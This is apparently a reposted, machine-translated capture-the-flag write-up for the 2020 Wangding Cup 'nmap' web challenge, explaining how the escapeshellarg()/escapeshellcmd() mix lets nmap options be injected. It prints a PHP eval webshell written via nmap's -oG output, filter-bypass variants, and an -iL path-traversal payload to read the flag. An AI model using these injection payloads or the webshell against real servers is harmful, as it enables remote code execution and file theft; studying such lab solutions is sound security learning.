当前位置:网站首页>2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2020 WANGDING cup_ Rosefinch formation_ Web_ nmap
2022-07-06 11:32:00 【Her&mes】
WP
Two inspection points
1. Investigate nmap Use
2. Investigate escapeshellarg() And escapeshellcmd() Mixed use vulnerability
The first one is OK to say , The title tells
The second point , I do not know! , I don't know where I got it , Autistic ing
Look at other masters wp, Referred to the [BUUCTF 2018]Online Tool, A code audit question , It directly tells the parameter process escapeshellarg() And escapeshellcmd() Handle
The two questions cannot be said to be the same , Can only say exactly the same .
nmap Use output related parameters
stay nmap Chinese net The following results can be found in :
-oN ( standard output )
-oX (XML Output )
-oS (ScRipT KIdd|3 oUTpuT)
-oG (Grep Output )
-oA ( Output to all formats )
There are other miscellaneous outputs , You can check it out , Here we use -oG structure payload
payload The subject is
<?php @eval($_POST["hack"]);?> -oG hack.php
However, echo after sending hacker word
There's a filter , Conduct fuzz test ,php The filtered , however phtml No, , And use php The short label of can replace <?php, That is to say :
<?= @eval($_POST["hack"]);?> -oG hack.phtml
Not yet here , In this way parload after escapeshellarg() And escapeshellcmd() Function processing , Can't generate files
The solution is simple , Just add spaces and single quotes , In this way, it can produce a normal parsing php file
' <?= @eval($_POST["hack"]);?> -oG hack.phtml '
The specific principle is written by the boss PHP escapeshellarg()+escapeshellcmd() Regression of
stay CSDN There are other masters' writings on escapeshellarg() And escapeshellcmd() Analysis of , simple
Except for writing webshell, There are also direct reading methods , Take advantage of -iL Parameters
' -iL ../../../../flag -o a '
Direct access a Just go , The following can also be done , But to visit a’
' -iL ../../../../flag -o a
The reason is also those two functions .
边栏推荐
- L2-001 emergency rescue (25 points)
- 引入了junit为什么还是用不了@Test注解
- ImportError: libmysqlclient. so. 20: Cannot open shared object file: no such file or directory solution
- yarn安装与使用
- Why can't I use the @test annotation after introducing JUnit
- Number game
- AcWing 1294. Cherry Blossom explanation
- double转int精度丢失问题
- ES6 promise object
- QT creator runs the Valgrind tool on external applications
猜你喜欢

When you open the browser, you will also open mango TV, Tiktok and other websites outside the home page

{一周总结}带你走进js知识的海洋

Word排版(小计)

Case analysis of data inconsistency caused by Pt OSC table change

{one week summary} take you into the ocean of JS knowledge

【yarn】CDP集群 Yarn配置capacity调度器批量分配

引入了junit为什么还是用不了@Test注解

Unable to call numpy in pycharm, with an error modulenotfounderror: no module named 'numpy‘

QT creator design user interface

人脸识别 face_recognition
随机推荐
L2-001 紧急救援 (25 分)
Error connecting to MySQL database: 2059 - authentication plugin 'caching_ sha2_ The solution of 'password'
牛客Novice月赛40
About string immutability
学习问题1:127.0.0.1拒绝了我们的访问
ES6 let and const commands
[MRCTF2020]套娃
Rhcsa certification exam exercise (configured on the first host)
Base de données Advanced Learning Notes - - SQL statements
解决安装Failed building wheel for pillow
UDS learning notes on fault codes (0x19 and 0x14 services)
Image recognition - pyteseract TesseractNotFoundError: tesseract is not installed or it‘s not in your path
MySQL与c语言连接(vs2019版)
Antlr4 uses keywords as identifiers
L2-007 家庭房产 (25 分)
分布式節點免密登錄
Learning question 1:127.0.0.1 refused our visit
AI benchmark V5 ranking
Mtcnn face detection
Nanny level problem setting tutorial